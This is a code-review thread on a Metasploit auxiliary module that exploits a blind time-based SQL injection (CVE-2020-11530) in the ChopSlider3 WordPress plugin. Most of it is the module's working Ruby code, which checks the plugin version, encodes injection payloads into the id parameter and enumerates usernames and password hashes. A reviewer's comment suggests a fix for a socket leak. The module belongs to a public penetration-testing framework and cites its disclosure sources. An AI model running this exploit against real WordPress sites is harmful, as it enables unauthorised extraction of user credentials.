modules/auxiliary/scanner/http/wp_chopslider_id_sqli.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress ChopSlider3 id SQLi Scanner',
+        'Description' => %q{
+          The iDangero.us Chop Slider 3 WordPress plugin prior to version 3.4
+          contains a blind SQL injection in the id parameter of the
+          get_sript/index.php page.  The injection is passed through GET
+          parameters, and thus must be encoded,
+          and magic_quotes is applied at the server.
+        },
+        'Author' =>
+          [
+            'h00die', # msf module
+            'SunCSR', # edb module
+            'Callum Murphy <callum.a.murphy.77@gmail.com>' # full disclosure
+          ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            ['EDB', '48457'],
+            ['CVE', '2020-11530'],
+            ['URL', 'https://seclists.org/fulldisclosure/2020/May/26']
+          ],
+        'Actions' => [
+          ['List Users', 'Description' => 'Queries username, password hash for COUNT users'],
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2020-05-12'
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 1]),
+    ]
+  end
+
+  def run_host(ip)
+    unless wordpress_and_online?
+      vprint_error('Server not online or not detected as wordpress')
+      return
+    end
+
+    checkcode = check_plugin_version_from_readme('chopslider', '3.4')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      vprint_error('ChopSlider3 version not vulnerable')
+      return
+    else
+      print_good('Vulnerable version detected')
+    end
+
+    sliderid = Rex::Text.rand_text_numeric(8..10)
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
+      if payload.include?("''")
+        payload.gsub!("''", 'hex(0x00)')
+      end
+
+      payload = Rex::Text.uri_encode(payload)
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'chopslider', 'get_script', 'index.php')}?id=#{sliderid}%20OR%20#{rand(0..10)}<>#{rand(11..1000)}%20AND%20#{payload}"
+      })
```

Comment:
I had an issue related to socket on Mac:
```
[02/01/2021 19:34:33] [e(0)] core: Error running against host 127.0.0.1 - Errno::EMFILE Too many open files - socket(2)
```
Apparently, `send_request_raw` does not close sockets by default and I had to set the `disconnect` argument to `true` to avoid this error:
```suggestion
      res = send_request_raw({
        'method' => 'GET',
        'uri' => "#{normalize_uri(target_uri.path, 'wp-content', 'plugins', 'chopslider', 'get_script', 'index.php')}?id=#{sliderid}%20OR%20#{rand(0..10)}<>#{rand(11..1000)}%20AND%20#{payload}"
      }, 20, true)
```

Reply:
don't use a mac, this will be an upgrade on many levels :)